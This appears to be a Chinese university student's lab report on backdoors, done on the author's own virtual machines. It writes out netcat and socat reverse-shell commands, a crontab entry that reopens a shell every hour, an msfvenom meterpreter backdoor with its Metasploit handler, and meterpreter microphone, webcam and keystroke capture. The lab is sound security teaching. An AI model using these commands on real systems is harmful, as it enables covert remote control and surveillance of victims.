• 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践


    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    基础问题回答

    • 例举你能想到的一个后门进入到你系统中的可能方式?
      下载免费应用的时候会有绑定木马。
      浏览某些网页时会有内置的木马程序。
    • 例举你知道的后门如何启动起来(win及linux)的方式?
      Windows:设置为开机自启动、用户直接执行带有后门的可执行文件
      Linux:通过crontab功能将后门设为定时启动;也可以通过对正常软件绑定注入shellcode
    • Meterpreter有哪些给你映像深刻的功能?
      我认为是截屏功能,能随时查看被访问主机的操作
    • 如何发现自己有系统有没有被安装后门?
      定期查杀木马。

    netcat的熟悉

    一、win7获取 linux 的shell

    1.首先在win7虚拟机开启监听ncat.exe -l -p 5317

    2.Linux反弹连接win10 nc 192.168.1.104 5317 -e /bin/sh此处IP为win10的ip

    3.Windows成功获得kali的shell

    二、Linux获得Windows Shell

    1.在kali中使用ifconfig查看IP

    2.打开监听nc -l -p 5317

    3.在Windows中反弹连接kali,ncat.exe -e cmd.exe 192.168.1.105 5317

    4.kali成功获得Windows的命令提示

    三、使用nc传输数据

    1.Windows下监听5317端口,ncat.exe -l 5317

    2.kali反弹连接到Windows的5317端口,nc 192.168.1.104 5317

    3.连接建立成功,双方可以相互传输数据

    四、使用nc传输文件

    1.Windows下监听5317端口,并把收到的数据保存到file1.out中,ncat.exe -l 5317 > file1out

    2.kali反弹连接到Windows的5317端口,nc 192.168.1.104 5317 < file1.in

    3.连接建立成功,Win可以收到kali发来的文件。


    实验内容

    一、使用netcat获取主机操作Shell,cron启动

    • 在Windows系统下,监听5317端口

    • 在Kali环境下,用crontab -e指令编辑一条定时任务,(crontab指令增加一条定时任务,"-e"表示编辑)选择编辑器时选择3(vim)

    • 在最后一行添加26 * * * * /bin/netcat 192.168.1.104 5317 -e /bin/sh,意思是在每个小时的第26分钟反向连接Windows主机的5317端口。

    效果如下:

    二、使用socat获取主机操作Shell, 任务计划启动

    • 在Windows7系统下,打开计算机管理,创建任务,填写任务名称后20165317,新建一个触发器,设为工作站锁定时

    • 在编辑操作中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5317 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5317,同时把cmd.exe的stderr重定向到stdout上

    • win+L或者右键运行,然后用kali输入socat - tcp:192.168.1.104:5317 获得成功

    三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    • 通过在kali中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=5317 -f exe > 20165317_backdoor.exe,IP地址为LinuxIP,生成了后门程序20165317_backdoor.exe

    • 在win7中监听ncat.exe -l 5317 > 20165317_backdoor.exe

    • 在Linux中输入nc 192.168.1.104 5317 < 20165317_backdoor.exe

    • 在Kali上使用msfconsole指令进入msf控制台

    • 输入use exploit/multi/handler使用监听模块,设置payload

    • set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

    • set LHOST 192.168.1.105,这里用的是LinuxIP,和生成后门程序时指定的IP相同

    • set LPORT 5317,同样要使用相同的端口

    • 设置完成后,执行监听

    • 在win7上运行后门程序,并且在kali得到了远程控制的shell

    四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    • 使用record_mic指令可以截获一段音频,可以用-d选项设置录制时间

    • 使用webcam_snap指令可以使用摄像头进行拍照(由于使用vbox无法使用摄像头,所以并没有抓取到照片。

    • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

    心得体会

    因为参考了学长学姐和已经完成的同学的博客,本次实验并没有遇到特别多的困难,更加深刻的体会到安全的重要性

  • 相关阅读:
    014-CallbackServlet代码
    PaymentServlet代码
    013-PaymentUtils工具类模板
    案例30-在线支付
    案例29-购物车提交订单
    案例28-清空购物车
    案例27-购物车删除单一商品
    案例26-购物车
    案例25-servlet的抽取
    在Eclipse或工作空间中 ,复制或修改项目后,把项目部署后发现还是原来的项目名称
  • 原文地址:https://www.cnblogs.com/ningxinyu/p/10588487.html
Copyright © 2020-2023  润新知